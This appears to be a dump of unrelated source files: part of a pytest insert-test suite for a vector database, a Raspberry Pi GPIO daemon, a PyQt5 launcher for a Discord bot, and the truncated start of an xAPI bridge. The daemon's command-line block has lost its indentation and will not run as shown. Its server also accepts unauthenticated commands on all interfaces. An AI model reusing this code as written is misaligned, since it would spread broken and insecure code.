        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_partition(self, connect, binary_collection):
        """
        target: test insert entities and create partition tag
        method: create collection and insert binary entities in it, with the partition_name param
        expected: the collection row count equals to nb
        """
        connect.create_partition(binary_collection, default_tag)
        result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
        assert len(result.primary_keys) == default_nb
        assert connect.has_partition(binary_collection, default_tag)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_binary_multi_times(self, connect, binary_collection):
        """
        target: test insert entities multi times and final flush
        method: create collection and insert binary entity multi and final flush
        expected: the collection row count equals to nb
        """
        # one entity per insert call; row count is only checked after the final flush
        for i in range(default_nb):
            result = connect.insert(binary_collection, default_binary_entity)
            assert len(result.primary_keys) == 1
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
        """
        target: test insert binary entities after build index
        method: build index and insert entities
        expected: no error raised
        """
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        result = connect.insert(binary_collection, default_binary_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([binary_collection])
        # normalize the expected param dict, then compare with the server's view
        index = connect.describe_index(binary_collection, "")
        ut.create_target_index(get_binary_index, binary_field_name)
        assert index == get_binary_index
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
        """
        target: test build index insert after vector
        method: insert vector and build index
        expected: no error raised
        """
        result = connect.insert(binary_collection, default_binary_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([binary_collection])
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        index = connect.describe_index(binary_collection, "")
        ut.create_target_index(get_binary_index, binary_field_name)
        assert index == get_binary_index
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_search(self, connect, binary_collection):
        """
        target: test search vector after insert vector after a while
        method: insert vector, sleep, and search collection
        expected: no error raised
        """
        result = connect.insert(binary_collection, default_binary_entities)
        connect.flush([binary_collection])
        query, _ = ut.gen_search_vectors_params(binary_field_name, default_binary_entities,
                                                ut.default_top_k, 1, metric_type="JACCARD")
        # the collection must be loaded before it can be searched
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, **query)
        logging.getLogger().debug(res)
        assert len(res[0]) == ut.default_top_k
class TestInsertAsync:
    """Async-mode insert tests (`_async=True` futures and completion callbacks)."""
    @pytest.fixture(scope="function", autouse=True)
    def skip_http_check(self, args):
        # async API is not exercised over the HTTP handler
        if args["handler"] == "HTTP":
            pytest.skip("skip in http mode")
    @pytest.fixture(
        scope="function",
        params=[
            1,
            1000
        ],
    )
    def insert_count(self, request):
        yield request.param
    def check_status(self, result):
        # callback used where the insert is expected to fail: result must be falsy
        logging.getLogger().info("In callback check status")
        assert not result
    def check_result(self, result):
        # callback used where the insert is expected to succeed: result must be truthy
        logging.getLogger().info("In callback check results")
        assert result
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_async(self, connect, collection, insert_count):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        nb = insert_count
        future = connect.insert(collection, ut.gen_entities(nb), _async=True)
        # .result() blocks until the server acknowledges the insert
        ids = future.result().primary_keys
        connect.flush([collection])
        assert len(ids) == nb
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_false(self, connect, collection, insert_count):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        nb = insert_count
        # _async=False returns the result object directly, not a future
        result = connect.insert(collection, ut.gen_entities(nb), _async=False)
        # ids = future.result()
        connect.flush([collection])
        assert len(result.primary_keys) == nb
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_async_callback(self, connect, collection, insert_count):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        nb = insert_count
        future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
        future.done()
        ids = future.result().primary_keys
        assert len(ids) == nb
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_long(self, connect, collection):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        # deliberately large batch to exercise a long-running async insert
        nb = 50000
        future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
        result = future.result()
        assert len(result.primary_keys) == nb
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        logging.getLogger().info(stats)
        assert stats[row_count] == nb
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_callback_timeout(self, connect, collection):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        # huge batch + 1s timeout: .result() is expected to raise
        nb = 100000
        future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
        with pytest.raises(Exception) as e:
            result = future.result()
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_async_invalid_params(self, connect):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        # collection name was never created, so resolving the future must fail
        collection_new = ut.gen_unique_str()
        future = connect.insert(collection_new, default_entities, _async=True)
        future.done()
        with pytest.raises(Exception) as e:
            result = future.result()
    # 1339
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_invalid_params_raise_exception(self, connect, collection):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        # empty entity list is rejected when the future is resolved
        entities = []
        future = connect.insert(collection, entities, _async=True)
        future.done()
        with pytest.raises(Exception) as e:
            future.result()
class TestInsertMultiCollections:
    """
    ******************************************************************
    The following cases are used to test `insert` function
    working across several collections at once
    ******************************************************************
    """
    @pytest.fixture(
        scope="function",
        params=ut.gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        logging.getLogger().info(request.param)
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return request.param
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_multi_collections(self, connect):
        """
        target: test insert entities
        method: create 10 collections and insert entities into them in turn
        expected: row count
        """
        collection_num = 10
        collection_list = []
        for i in range(collection_num):
            collection_name = ut.gen_unique_str(uid)
            collection_list.append(collection_name)
            connect.create_collection(collection_name, default_fields)
            result = connect.insert(collection_name, default_entities)
            connect.flush([collection_name])
            assert len(result.primary_keys) == default_nb
            stats = connect.get_collection_stats(collection_name)
            assert stats[row_count] == default_nb
        # clean up every collection created above
        for i in range(collection_num):
            connect.drop_collection(collection_list[i])
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_drop_collection_insert_entity_another(self, connect, collection):
        """
        target: test insert vector to collection_1 after collection_2 deleted
        method: delete collection_2 and insert vector to collection_1
        expected: row count equals the length of entities inserted
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        # dropping an unrelated collection must not affect the insert
        connect.drop_collection(collection)
        result = connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        assert len(result.primary_keys) == 1
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
        """
        target: test insert vector to collection_2 after build index for collection_1
        method: build index and insert vector
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.create_index(collection, field_name, get_simple_index)
        result = connect.insert(collection_name, default_entity)
        assert len(result.primary_keys) == 1
        # FLAT collections report no explicit index, so skip the comparison
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection, "")
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        connect.drop_collection(collection_name)
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
        """
        target: test insert vector to collection_2 after build index for collection_1
        method: build index and insert vector
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection_name, "")
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
        """
        target: test insert vector to collection_2 after build index for collection_1 for a while
        method: build index and insert vector
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_entity_insert_entity_another(self, connect, collection):
        """
        target: test insert entity to collection_1 after search collection_2
        method: search collection and insert entity
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.load_collection(collection)
        # the searched collection is empty, so no hits are expected
        res = connect.search(collection, **default_single_query)
        assert len(res[0]) == 0
        connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        stats = connect.get_collection_stats(collection_name)
        assert stats[row_count] == 1
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_entity_search_entity_another(self, connect, collection):
        """
        target: test insert entity to collection_1 after search collection_2
        method: search collection and insert entity
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, **default_single_query)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_sleep_search_entity_another(self, connect, collection):
        """
        target: test insert entity to collection_1 after search collection_2 a while
        method: search collection, sleep, and insert entity
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, **default_single_query)
        assert len(res[0]) == 0
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def _test_insert_entity_during_release_collection(self, connect, collection):
        """
        target: test insert entity during release
        method: release collection async, then do insert operation
        expected: insert ok
        """
        for i in range(10):
            connect.insert(collection, default_entities)
        connect.flush([collection])
        connect.load_collection(collection)
        def release():
            connect.release_collection(collection)
        # BUG FIX: the original passed args=(collection,) although release()
        # takes no parameters, so the worker thread died with a TypeError and
        # the collection was never actually released during the insert.
        t = threading.Thread(target=release)
        t.start()
        result = connect.insert(collection, default_entities)
        assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
    """
    Test inserting vectors with invalid collection names
    """
    # Each fixture below parametrizes one category of invalid input.
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_name(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_type(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_int_value(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_ints()
    )
    def get_entity_id(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_vectors()
    )
    def get_field_vectors_value(self, request):
        yield request.param
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
        """
        target: test insert, with using customize ids, which are not int64
        method: create collection and insert entities in it
        expected: raise an exception
        """
        entity_id = get_entity_id
        ids = [entity_id for _ in range(default_nb)]
        # NOTE(review): `ids` is passed as the third positional argument —
        # verify against the client API that this is the intended parameter.
        with pytest.raises(Exception):
            connect.insert(id_collection, default_entities, ids)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
        """
        target: test insert with invalid scenario
        method: insert with invalid collection name
        expected: raise exception
        """
        collection_name = get_collection_name
        with pytest.raises(Exception):
            connect.insert(collection_name, default_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
        """
        target: test insert with invalid scenario
        method: insert with invalid partition name
        expected: raise exception
        """
        tag_name = get_tag_name
        connect.create_partition(collection, default_tag)
        # None is treated as "no partition given" and must succeed;
        # every other invalid string must be rejected
        if tag_name is not None:
            with pytest.raises(Exception):
                connect.insert(collection, default_entity, partition_name=tag_name)
        else:
            connect.insert(collection, default_entity, partition_name=tag_name)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
        """
        target: test insert with invalid field name
        method: rename the "int64" field to an invalid string and insert
        expected: raise exception
        """
        tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
        """
        target: test insert with invalid field
        method: insert with invalid field type
        expected: raise exception
        """
        field_type = get_field_type
        tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'float', field_type)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
        """
        target: test insert with invalid field
        method: insert with invalid field value
        expected: raise exception
        """
        field_value = get_field_int_value
        tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
        """
        target: test insert with invalid entity
        method: insert with invalid entity value
        expected: raise exception
        """
        tmp_entity = copy.deepcopy(default_entity)
        # corrupt a single component of the first vector
        src_vector = tmp_entity[-1]["values"]
        src_vector[0][1] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
    """
    Test inserting vectors with invalid collection names
    """
    # Same invalid-input fixtures as TestInsertInvalid, applied to binary collections.
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_name(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_type(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_int_value(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_ints()
    )
    def get_entity_id(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_vectors()
    )
    def get_field_vectors_value(self, request):
        yield request.param
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
        """
        target: test insert with invalid field name
        method: insert with invalid field name
        expected: raise exception
        """
        tmp_entity = ut.update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
        """
        target: test insert with invalid field value
        method: give the "int64" field an invalid value and insert
        expected: raise exception
        """
        tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
        """
        target: test insert with invalid scenario
        method: insert with invalid field entity
        expected: raise exception
        """
        tmp_entity = copy.deepcopy(default_binary_entity)
        # replace the first binary vector wholesale with an invalid value
        src_vectors = tmp_entity[-1]["values"]
        src_vectors[0] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
        """
        target: test insert, with using customize ids, which are not int64
        method: create collection and insert entities in it
        expected: raise an exception
        """
        entity_id = get_entity_id
        ids = [entity_id for _ in range(default_nb)]
        # NOTE(review): `ids` is passed as the third positional argument —
        # verify against the client API that this is the intended parameter.
        with pytest.raises(Exception):
            connect.insert(binary_id_collection, default_binary_entities, ids)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
        """
        target: test insert with invalid field type
        method: insert with invalid field type
        expected: raise exception
        """
        field_type = get_field_type
        tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
        """
        target: test insert with invalid field
        method: insert with invalid field value
        expected: raise exception
        """
        tmp_entities = copy.deepcopy(default_binary_entities)
        # corrupt the second vector of the batch
        src_vector = tmp_entities[-1]["values"]
        src_vector[1] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entities)
|
blinkdingsdo.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, time, socket, logging, signal
import RPi.GPIO as GPIO
from threading import Thread
from daemon import Daemon
def blinkdingsdo():
    """Run the blink/alert TCP control server on a Raspberry Pi (Python 2).

    Listens on PORT and serves simple text commands per connection
    (help / blink_on / blink_off / alert / weather / quit), driving GPIO
    pin 8 (blink light) and pin 10 (alarm).  Pin 12 is a pulled-up switch
    input whose falling edge turns the blink light off again.  Shuts down
    cleanly on SIGTERM/SIGINT/SIGHUP/SIGQUIT.
    """
    HOST = ''    # Symbolic name meaning all available interfaces
    PORT = 8888  # Arbitrary non-privileged port
    logfile = '/var/log/blinkdingdo.log'
    logging.basicConfig(filename=logfile, format='%(asctime)s %(name)s %(levelname)s:%(message)s', level=logging.DEBUG)
    mylog = logging.getLogger("default")
    mylog.info("Beginn Log")

    # Function for handling connections. This will be used to create threads.
    def clientthread(conn, addr):
        # Sending message to connected client
        conn.send('Wilkommen auf dem Server.\nFuer Hilfe bitte schreiend im Kreis herumrennen oder \'help\' eingeben.\n')  # send only takes string
        # Infinite loop so that the function does not terminate and the thread does not end.
        while True:
            # Receiving from client
            data = conn.recv(1024).strip()
            if data == 'help':
                reply = '''\
Blinkdingsdo v0.1
blink_on    Schaltet das Blinklicht an.
blink_off   Schaltet das Blinklicht aus.
alert       Löst einen Cordlessalarm aus.
weather     Zeigt den aktuellen Wetterbericht für ihre Region an.
quit        Beendet die Verbindung.
'''
            elif data == 'blink_on':
                # switch the blink light on
                mylog.info('blink_on von ' + addr[0] + ':' + str(addr[1]))
                try:
                    # drop the switch handler while forcing the pin high,
                    # then re-arm it so the hardware switch can turn it off
                    GPIO.remove_event_detect(12)
                    GPIO.output(8, GPIO.HIGH)
                    time.sleep(2)
                    GPIO.add_event_detect(12, GPIO.FALLING, callback=switchoff2, bouncetime=200)
                except Exception as e:
                    mylog.info(str(e))
                reply = 'Blinklicht eingeschaltet\n'
            elif data == 'blink_off':
                # switch the blink light off
                mylog.info('blink_off von ' + addr[0] + ':' + str(addr[1]))
                GPIO.output(8, GPIO.LOW)
                reply = 'Blinklicht ausgeschaltet\n'
            elif data == 'alert':
                # trigger the alarm pulse in a background thread
                alertthread = Thread(target=alert, args=(1,))
                alertthread.start()
                reply = 'Alarm ausgelöst\n'
            elif data == 'weather':
                reply = 'Seriously ????????????????????????\n'
            elif data == 'quit':
                conn.sendall('ByeBye\n')
                break
            else:
                reply = 'Sie chönts afacht nöd\n'
            conn.sendall(reply)
        mylog.warning('Disconnected with ' + addr[0] + ':' + str(addr[1]))
        conn.close()

    def alert(x):
        # pulse the alarm output (pin 10) for two seconds
        GPIO.output(10, GPIO.HIGH)
        mylog.info('alarm ausgeloest')
        time.sleep(2)
        GPIO.output(10, GPIO.LOW)

    def switchoff(x):
        # unused polling variant of the switch handler (kept for reference)
        while True:
            GPIO.wait_for_edge(12, GPIO.FALLING, bouncetime=200)
            mylog.info('Switch betaetigt')
            GPIO.output(8, GPIO.LOW)

    def switchoff2(channel):
        # edge-detect callback: the hardware switch turns the blink light off
        mylog.info('Switch betaetigt')
        GPIO.output(8, GPIO.LOW)

    def handler(signum, frame):
        # signal handler: close the socket, reset the GPIOs, then exit
        mylog.info('Programm wird beendet')
        try:
            s.close()
            mylog.info('Socket geschlossen')
            GPIO.remove_event_detect(12)
            GPIO.output(8, GPIO.LOW)
            GPIO.output(10, GPIO.LOW)
            mylog.info('GPIOs zurueckgesetzt')
        except Exception as e:
            mylog.info(str(e))
        mylog.info("Ende Log")
        logging.shutdown()
        # BUG FIX: the original called self.delpid() here, but `self` does not
        # exist in this function's scope, so the handler died with a NameError
        # and sys.exit(0) was never reached.  Pidfile cleanup is the Daemon
        # class's responsibility (Daemon.stop removes the pidfile).
        sys.exit(0)

    mylog.info('Beginn initialisierung')
    # use the RPi.GPIO BOARD layout (physical pin numbers)
    GPIO.setmode(GPIO.BOARD)
    # configure output pins
    GPIO.setup(8, GPIO.OUT)
    GPIO.setup(10, GPIO.OUT)
    # configure the switch input with its pull-up enabled
    GPIO.setup(12, GPIO.IN, pull_up_down=GPIO.PUD_UP)
    # drive both outputs low initially
    GPIO.output(8, GPIO.LOW)
    GPIO.output(10, GPIO.LOW)
    mylog.info('Initialisierung abgeschlossen')
    # install the cleanup handler for every relevant termination signal
    for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
        signal.signal(sig, handler)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    mylog.info('Socket created')
    # Bind socket to local host and port
    try:
        s.bind((HOST, PORT))
    except socket.error as msg:
        mylog.error('Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
        sys.exit()
    mylog.info('Socket bind complete')
    # Start listening on socket
    s.listen(10)
    mylog.info('Socket now listening')
    GPIO.add_event_detect(12, GPIO.FALLING, callback=switchoff2, bouncetime=200)
    # accept loop: one handler thread per client connection
    while True:
        # wait to accept a connection - blocking call
        conn, addr = s.accept()
        mylog.info('Connected with ' + addr[0] + ':' + str(addr[1]))
        x1 = Thread(target=clientthread, args=(conn, addr,))
        x1.start()
#########################################################################
# Klasse ueberschreiben
class MyDaemon(Daemon):
    """Daemon subclass whose worker body is the GPIO/socket server."""
    def run(self):
        # entry point invoked by Daemon.start()/restart()
        blinkdingsdo()
#########################################################################
# Kommandozeilenparameter abfangen
if __name__ == "__main__":
daemon = MyDaemon('/tmp/daemon-example.pid')
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
else:
print "Unknown command"
sys.exit(2)
sys.exit(0)
else:
print "usage: %s start|stop|restart" % sys.argv[0]
sys.exit(2)
|
QTMain.py | from PyQt5 import QtCore, QtGui, QtWidgets
from main import main
from multiprocessing import Process
import multiprocessing
import os
import qdarkstyle
from PyQt5.QtGui import QIcon
import sys
import nacl
class Ui_MainWindow(object):
    """Hand-edited Qt-Designer-style UI class for the RogueBot window.

    Owns a multiprocessing.Process (target=main) that is started and
    stopped by the large Start/Stop button.
    """
    def clicked(self):
        """Toggle the bot worker process and update the button state."""
        self.directoryNoExist.hide()
        if not self.running:
            self.startButton.setText("Stop")
            self.startButton.setStyleSheet("background-color: red")
            # spawn the bot in a separate process so the GUI stays responsive
            self.process = Process(target=main)
            self.process.start()
            self.running = True
        else:
            self.startButton.setText("Start")
            self.startButton.setStyleSheet("background-color: green")
            self.process.terminate()
            self.process.join()
            self.running = False
    def __init__(self):
        # whether the worker process is currently running
        self.running = False
    def openDirectory(self):
        """Open the bot's configuration directory in Explorer, or show an
        error label if it does not exist.

        NOTE(review): Windows-only -- relies on %LOCALAPPDATA% and
        os.startfile; LOCALAPPDATA being unset would raise here.
        """
        path = os.getenv("LOCALAPPDATA")+"\\DiscordBot"
        if os.path.exists(path):
            path = os.path.realpath(path)
            os.startfile(path)
        else:
            self.directoryNoExist.show()
    def setupUi(self, MainWindow):
        """Build all widgets, wire signals, and apply initial styling."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(537, 436)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # big start/stop toggle button
        self.startButton = QtWidgets.QPushButton(self.centralwidget)
        self.startButton.setGeometry(QtCore.QRect(110, 220, 301, 101))
        font = QtGui.QFont()
        font.setFamily("Arial Black")
        font.setPointSize(34)
        font.setKerning(True)
        font.setStyleStrategy(QtGui.QFont.PreferAntialias)
        self.startButton.setFont(font)
        self.startButton.setMouseTracking(False)
        self.startButton.setObjectName("startButton")
        # window title label
        self.Title = QtWidgets.QLabel(self.centralwidget)
        self.Title.setGeometry(QtCore.QRect(170, 15, 311, 101))
        font = QtGui.QFont()
        font.setFamily("Amiri Quran")
        font.setPointSize(48)
        self.Title.setFont(font)
        self.Title.setObjectName("Title")
        # opens the configuration directory
        self.directoryButton = QtWidgets.QPushButton(self.centralwidget)
        self.directoryButton.setGeometry(QtCore.QRect(170, 330, 171, 41))
        self.directoryButton.setObjectName("directoryButton")
        self.label = QtWidgets.QLabel(self.centralwidget)
        self.label.setGeometry(QtCore.QRect(180, 130, 221, 28))
        font = QtGui.QFont()
        font.setPointSize(12)
        self.label.setFont(font)
        self.label.setObjectName("label")
        # Discord logo image
        self.label_2 = QtWidgets.QLabel(self.centralwidget)
        self.label_2.setGeometry(QtCore.QRect(70, 30, 111, 101))
        self.label_2.setText("")
        self.label_2.setPixmap(QtGui.QPixmap("resources/91_Discord_logo_logos-512.webp"))
        self.label_2.setScaledContents(True)
        self.label_2.setObjectName("label_2")
        MainWindow.setCentralWidget(self.centralwidget)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        # signal wiring
        self.directoryButton.clicked.connect(self.openDirectory)
        self.startButton.clicked.connect(self.clicked)
        # error label shown when the config directory is missing
        self.directoryNoExist = QtWidgets.QLabel(self.centralwidget)
        self.directoryNoExist.setGeometry(QtCore.QRect(50, 370, 461, 31))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.directoryNoExist.setFont(font)
        self.directoryNoExist.setObjectName("directoryNoExist")
        self.directoryNoExist.setStyleSheet("color: red")
        self.directoryNoExist.hide()
        self.startButton.setStyleSheet("background-color: green")
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Set all user-visible strings (and the window icon)."""
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "RogueBot"))
        MainWindow.setWindowIcon(QIcon("../91_Discord_logo_logos-512.webp"))
        self.startButton.setText(_translate("MainWindow", "Start"))
        self.Title.setText(_translate("MainWindow", "RogueBot"))
        self.directoryButton.setText(_translate("MainWindow", "Open Configuration Directory"))
        self.label.setText(_translate("MainWindow", "Made by Rogue#0478"))
        self.directoryNoExist.setText(_translate("MainWindow", "The configuration directory doesn\'t exist. Please run the bot once to create it."))
if __name__ == "__main__":
    # required for frozen (PyInstaller/cx_Freeze) builds that spawn workers
    multiprocessing.freeze_support()
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    # dark theme applied after widget construction
    app.setStyleSheet(qdarkstyle.load_stylesheet())
    MainWindow.show()
    sys.exit(app.exec_())
__main__.py | """Main process with queue management and remote LRS communication."""
from datetime import datetime
import json
import logging
import os
import signal
import sys
import threading
import time
from pyinotify import WatchManager, Notifier, NotifierError, EventsCodes, ProcessEvent
from tincan import statement_list
from xapi_bridge import client
from xapi_bridge import converter
from xapi_bridge import exceptions
from xapi_bridge import settings
# the status HTTP server module is only needed when health publishing is on
if settings.HTTP_PUBLISH_STATUS is True:
    from xapi_bridge import server
logger = logging.getLogger('edX-xapi-bridge main')
class QueueManager:
